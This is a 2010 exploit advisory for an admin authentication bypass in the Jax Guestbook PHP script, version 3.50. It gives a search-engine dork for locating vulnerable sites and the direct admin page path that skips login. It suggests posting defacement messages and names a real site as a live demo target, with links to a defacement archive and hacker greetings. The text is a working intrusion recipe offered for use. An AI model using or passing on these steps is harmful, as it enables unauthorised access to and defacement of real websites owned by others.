========================================
Jax Guestbook admin bypass vulnerability
========================================

# Exploit Title: Jax Guestbook admin bypass vulnerability
# Date: 3.10.2010
# Author: EraGoN
# Software http://www.jtr.de/scripting/php/guestbook/index_eng.html
# Version: 3.50
# Tested on: Windows XP - SP2/SP3

Hi guys !

Dork :
inurl:jax_guestbook.php

In the url http://site.com/guestbook/jax_guestbook.php delete jax_guestbook.php

URL to add :

/admin/guestbook.admin.php

You can add news writing hacked etc..

Results in /../jax_guestbook.php

DEMO :
http://www.foerderverein-lfs-celle.de/gulli/jax_guestbook.php?language=german

###############

http://www.zone-h.org/archive/published=0/notifier=EraGoN

Greetz : The|Denny - Loock3D - DJ-DUKLI and all albanian/kosovo hackers !

www.eragon.ws - www.albanian-legends.com

###############


# Inj3ct0r.com [2010-10-03]